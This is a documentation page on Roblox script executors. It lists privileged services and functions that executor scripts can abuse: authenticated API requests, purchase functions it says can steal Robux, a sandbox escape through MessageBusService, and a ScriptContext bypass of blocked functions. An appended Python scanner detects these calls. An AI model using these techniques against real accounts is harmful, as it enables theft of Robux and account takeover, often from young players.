BLuau Documentation

Warning: This information is provided to raise awareness about potential vulnerabilities. Do not attempt to exploit or misuse any of the following information. (Or you can)

HttpRbxApiService

You can abuse Roblox's HttpRbxApiService, which is normally only accessible to CoreScripts. Since executors have the thread level of 8, you have the permissions to use the service!

                        
    -- Luau code to grab the amount of Robux that the user has
    local robux = game:GetService("HttpRbxApiService"):GetAsyncFullUrl("https://economy.roblox.com/v1/user/currency")
    print(robux)
                        
                    

This code sends an account-authenticated request to the Roblox API to grab the amount of Robux that the user has, and it can be abused to steal Robux and account information.

BrowserService

Roblox's BrowserService was, again, only meant to be accessed by CoreScripts. Using this service opens up a ton of critical vulnerabilities, such as cookie grabbing, automatic downloading of malicious files, execution of potentially malicious JavaScript, and more.

          
    -- Luau code to open a Google URL using BrowserService
    game:GetService("BrowserService"):OpenBrowserWindow('https://google.com')

This code uses the BrowserService to open a Google URL. Abusing BrowserService can lead to critical vulnerabilities like cookie grabbing and executing potentially malicious JavaScript.

GuiService

Just like HttpRbxApiService, GuiService can be abused to send authenticated requests to the Roblox API.

          
    -- Luau code to open a Google URL using GuiService
    game:GetService("GuiService"):OpenBrowserWindow('https://google.com/')

This code uses the GuiService to open a Google URL. GuiService, like BrowserService, can be abused to send authenticated requests to the Roblox API.

MarketplaceService

MarketplaceService has a lot of functions that can be used to steal a Roblox account's Robux.

          
    local m = game:GetService("MarketplaceService")

    -- gets the account's balance and prints it
    local r = m:GetRobuxBalance()
    print(r)

    -- below can be used to steal Robux

    -- if you wish to see the functions' required parameters, check the docs:
    -- https://robloxapi.github.io/ref/class/MarketplaceService.html
    m:PerformPurchase()
    m:PerformPurchaseV2()
    m:PromptNativePurchaseWithLocalPlayer()
    m:PromptNativePurchase()
    m:PromptCollectiblesPurchase()
    m:PromptGamePassPurchase()
    m:PromptBundlePurchase()
    m:PromptThirdPartyPurchase()
    m:PromptRobloxPurchase()
    m:PromptProductPurchase()
    m:PromptPurchase()

    -- in the docs, there are also signals that could potentially be fired by an
    -- executor's firesignal function. if you have already blocked the functions
    -- above in your executor, consider blocking firesignal from firing those
    -- malicious signals.
                
            

This code demonstrates various functions in MarketplaceService that can be abused to steal a Roblox Account's Robux. Be cautious and avoid using these functions.

HttpService

You've probably already tried sending requests to the Roblox API with HttpService at one point, and it throws the error "HttpService can't access ROBLOX resources." But did you know that there is an unrestricted function in HttpService, allowing you to send authenticated requests to the API, resulting in Robux Stealer Scripts? Introducing: RequestInternal!

          
    -- Luau code to send an authenticated request to the Roblox API using RequestInternal
    game:GetService("HttpService"):RequestInternal({Url = "https://www.google.com/"})

This code demonstrates the use of RequestInternal in HttpService to send authenticated requests to the Roblox API. Exercise caution as this can lead to unauthorized access.

OpenCloudService

OpenCloudService is a new service added to Roblox and, again, it allows you to send authenticated requests to the Roblox API.

          
    -- Luau code to send an authenticated request to the Roblox API using OpenCloudService
    game:GetService("OpenCloudService"):HttpRequestAsync({Url = 'https://google.com'})

This code uses OpenCloudService to send an authenticated request to the Roblox API. Be aware of potential security risks associated with abusing this service.

MessageBusService

We can abuse MessageBusService to access the openURLRequest messages, which lets us escape the sandbox, resulting in an RCE (Remote Code Execution) vulnerability.

          
    -- Luau code to publish openURLRequest messages and potentially escape the sandbox
    game:GetService("MessageBusService"):Publish(game:GetService("MessageBusService"):GetMessageId("Linking", "openURLRequest"), {url = "notepad.exe"})

This code abuses MessageBusService to access openURLRequest messages, potentially leading to Remote Code Execution (RCE) vulnerabilities. Avoid such practices to ensure a secure environment.

game:HttpGet

In most Roblox loadstring scripts, you might've seen "game:HttpGet" right after loadstring. HttpGet is the function that sends the GET request to a specific URL to grab a script, and loadstring is the one that compiles the text returned from that URL as Luau code. HttpGet can be abused to send authenticated requests to the Roblox API, resulting in Robux stealers, account stealers and more.

          
    -- Luau code to send authenticated requests to the Roblox API using game:HttpGet
    game:HttpGet('REPLACE THIS WITH ROBLOX API URL')

This code showcases the use of game:HttpGet to send authenticated requests to the Roblox API. Be cautious as this can lead to the creation of scripts for stealing Robux and accounts.

request Function

The Roblox Unified Naming Convention (UNC) has a custom function called "request"; its aliases include http_request, http, syn.request, and more. Since 99% of executors support UNC, this becomes critical: the function can be abused to send authenticated requests to the Roblox API.

          
    -- Luau code to send authenticated requests to the Roblox API using the request function
    request({
        Url = 'https://google.com',
        Method = 'GET' -- you can also use POST
    })
    -- For POST requests, add the application/json header

This code demonstrates the use of the "request" function, following the Unified Naming Convention (UNC), to send authenticated requests to the Roblox API. Exercise caution due to its potential for unauthorized access.

Bypassing blocked functions with ScriptContext

Check James Napora's GitHub Gist for more information. Basically, this uses ScriptContext to create a CoreScript, parents it to an actor and elevates its thread identity to 8, allowing you to use the functions above even if they were blocked.

          
    -- Luau code to bypass blocked functions using ScriptContext
    game:GetService("ScriptContext"):AddCoreScriptLocal("CoreScripts/ProximityPrompt", actor)

This code highlights a method to bypass blocked functions using ScriptContext, potentially enabling the use of functions even if they were blocked. Understand the associated risks and avoid such practices for security reasons.
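For screening a script before it is run, the method names and request aliases listed on this page can be matched statically in the script text. The following is an added example, not part of BLuau or of any executor; `scan`, the pattern names and the sample script are constructed for illustration, and names built from strings at runtime evade it, so it complements blocking inside the executor rather than replacing it.

```python
import re

# Method names this page lists, keyed by the service it lists them under.
PAGE_METHODS = {
    "HttpRbxApiService": ["GetAsyncFullUrl"],
    "BrowserService": ["OpenBrowserWindow"],
    "GuiService": ["OpenBrowserWindow"],
    "MarketplaceService": [
        "GetRobuxBalance", "PerformPurchase", "PerformPurchaseV2",
        "PromptNativePurchaseWithLocalPlayer", "PromptNativePurchase",
        "PromptCollectiblesPurchase", "PromptGamePassPurchase",
        "PromptBundlePurchase", "PromptThirdPartyPurchase",
        "PromptRobloxPurchase", "PromptProductPurchase", "PromptPurchase"],
    "HttpService": ["RequestInternal"],
    "OpenCloudService": ["HttpRequestAsync"],
    "MessageBusService": ["Publish", "GetMessageId"],
    "ScriptContext": ["AddCoreScriptLocal"],
    "game": ["HttpGet"],
}
# Global request aliases named on this page.
REQUEST_ALIASES = ["syn.request", "http_request", "request", "http"]

_names = sorted({m for methods in PAGE_METHODS.values() for m in methods})
# A member reference: obj:Name, obj.Name or obj["Name"], called or merely read.
MEMBER_RE = re.compile(r"(?:[:.]\s*|\[\s*[\"'])(" + "|".join(_names) + r")\b")
# A bare global alias: not a member of another object and not a URL scheme.
ALIAS_RE = re.compile(
    r"(?<![\w.:])(" + "|".join(map(re.escape, REQUEST_ALIASES)) + r")\b(?!:)")

def scan(source):
    """Return sorted (line_number, name) pairs for every listed name in Luau text."""
    findings = []
    for number, line in enumerate(source.splitlines(), 1):
        # Comments are scanned too: a flagged comment is a harmless false positive.
        for regex in (MEMBER_RE, ALIAS_RE):
            findings += [(number, m.group(1)) for m in regex.finditer(line)]
    return sorted(findings)

# Constructed sample script (not taken from a real script).
SAMPLE = '''local m = game:GetService("MarketplaceService")
local r = m:GetRobuxBalance()
local f = m["PerformPurchaseV2"]
game:GetService("HttpService"):RequestInternal({Url = "https://www.google.com/"})
local send = http_request
print("hello")
'''

if __name__ == "__main__":
    for number, name in scan(SAMPLE):
        print(f"line {number}: {name}")
```
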